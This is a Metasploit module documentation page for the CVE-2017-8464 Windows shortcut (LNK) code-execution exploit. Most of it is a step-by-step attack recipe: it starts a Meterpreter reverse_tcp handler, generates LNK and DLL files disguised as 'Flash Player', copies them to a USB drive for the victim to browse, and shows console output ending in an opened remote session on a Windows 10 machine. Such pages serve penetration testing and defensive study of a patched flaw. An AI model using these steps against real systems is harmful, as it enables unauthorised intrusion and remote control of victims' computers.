LNK Code Execution Vulnerability - Metasploit
This page contains detailed information about how to use the exploit/windows/fileformat/cve_2017_8464_lnk_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: LNK Code Execution Vulnerability
Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
Source code: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
Disclosure date: 2017-06-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-0096, CVE-2017-8464
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Stability:
- crash-service-restarts: Module may crash the service, but the service restarts.
Basic Usage
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > show targets
... a list of targets ...
msf exploit(cve_2017_8464_lnk_rce) > set TARGET target-id
msf exploit(cve_2017_8464_lnk_rce) > show options
... show and set options ...
msf exploit(cve_2017_8464_lnk_rce) > exploit
Knowledge Base
Vulnerable Application
This vulnerability affects any Windows version without the patch for CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of this, the exploit DLL file needs to be on a local file system or an USB drive. A fix was released in the June 2017 Patch Tuesday.
Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
Verification Steps
Start a handler
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [ip victim connects back to]
exploit -j
Run the exploit
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [ip victim connects back to]
exploit
Copy files to USB drive & open on vulnerable system
cp /root/.msf4/local/* [USB drive path]
- Insert device in target machine and browse to it
Options
FILENAME
The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.
DLLNAME
The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.
DRIVE
Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.
Windows 10 x64 (Build 14393)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit
msf exploit(cve_2017_8464_lnk_rce) > exploit
[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-5G8HK7E
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the windows/fileformat/cve_2017_8464_lnk_rce exploit module looks in the msfconsole:
msf6 > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show info
Name: LNK Code Execution Vulnerability
Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2017-06-13
Provided by:
Uncredited
Yorick Koster
Spencer McIntyre
Module stability:
crash-service-restarts
Available targets:
Id Name
-- ----
0 Automatic
1 Windows x64
2 Windows x86
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DLLNAME FlashPlayerCPLApp.cpl no The DLL file containing the payload
FILENAME Flash Player.lnk no The LNK file
PATH no An explicit path to where the files will be hosted
Payload information:
Space: 2048
Description:
This module exploits a vulnerability in the handling of Windows
Shortcut files (.LNK) that contain a dynamic icon, loaded from a
malicious DLL. This vulnerability is a variant of MS15-020
(CVE-2015-0096). The created LNK file is similar except an
additional SpecialFolderDataBlock is included. The folder ID set in
this SpecialFolderDataBlock is set to the Control Panel. This is
enough to bypass the CPL whitelist. This bypass can be used to trick
Windows into loading an arbitrary DLL file. If no PATH is specified,
the module will use drive letters D through Z so the files may be
placed in the root path of a drive such as a shared VM folder or USB
drive.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-8464
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
https://msdn.microsoft.com/en-us/library/dd871305.aspx
http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
Module Options
This is a complete list of options available in the windows/fileformat/cve_2017_8464_lnk_rce exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show options
Module options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DLLNAME FlashPlayerCPLApp.cpl no The DLL file containing the payload
FILENAME Flash Player.lnk no The LNK file
PATH no An explicit path to where the files will be hosted
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show advanced
Module advanced options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler true no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
LnkComment Manage Flash Player Settings yes The comment to use in the generated LNK file
LnkDisplayName Flash Player yes The display name to use in the generated LNK file
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/fileformat/cve_2017_8464_lnk_rce module can exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Windows x64
2 Windows x86
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/fileformat/cve_2017_8464_lnk_rce exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show payloads
Evasion Options
Here is the full list of possible evasion options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12205 Merged Pull Request: Update module and generate splats from http:// to https://
- #10873 Merged Pull Request: Add applicable notes to my exploit modules
- #9041 Merged Pull Request: Add an LPE Version Of CVE-2017-8464
- #9032 Merged Pull Request: Update the CVE-2017-8464 module
- #8960 Merged Pull Request: spelling/grammar fixes part 3
- #8767 Merged Pull Request: Add exploit module for CVE-2017-8464 LNK Code Execution Vulnerability
References
- CVE-2017-8464
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
- http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
- https://msdn.microsoft.com/en-us/library/dd871305.aspx
- http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
See Also
Check also the following modules related to this module:
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
- exploit/windows/smb/ms15_020_shortcut_icon_dllloader
- exploit/windows/dcerpc/cve_2021_1675_printnightmare
- exploit/windows/local/cve_2018_8453_win32k_priv_esc
- exploit/windows/local/cve_2019_1458_wizardopium
- exploit/windows/local/cve_2020_0668_service_tracing
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/cve_2020_0796_smbghost
- exploit/windows/local/cve_2020_1048_printerdemon
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/windows/local/cve_2020_1313_system_orchestrator
- exploit/windows/local/cve_2020_1337_printerdemon
- exploit/windows/local/cve_2020_17136
- exploit/windows/local/cve_2021_1732_win32k
- exploit/windows/local/cve_2021_21551_dbutil_memmove
- exploit/windows/local/cve_2021_40449
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/local/cve_2022_26904_superprofile
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
- exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- exploit/windows/smb/cve_2020_0796_smbghost
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/cve_2021_3493_overlayfs
- exploit/linux/local/cve_2021_38648_omigod
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/local/cve_2022_0995_watch_queue
- exploit/linux/misc/cve_2020_13160_anydesk
- exploit/linux/misc/cve_2021_38647_omigod
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/sap/cve_2020_6207_solman_rs
Related Nessus plugins:
- MS15-020: Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (3041836) (EASYHOOKUP)
- KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update
- KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update
- Windows 7 and Windows Server 2008 R2 June 2017 Security Updates
- Windows Server 2012 June 2017 Security Updates
- KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update
- Windows 8.1 and Windows Server 2012 R2 June 2017 Security Updates
- KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update
- Microsoft Security Advisory 4025685: Windows Vista (June 2017)
- Windows 2008 June 2017 Multiple Security Updates
Authors
- Uncredited
- Yorick Koster
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.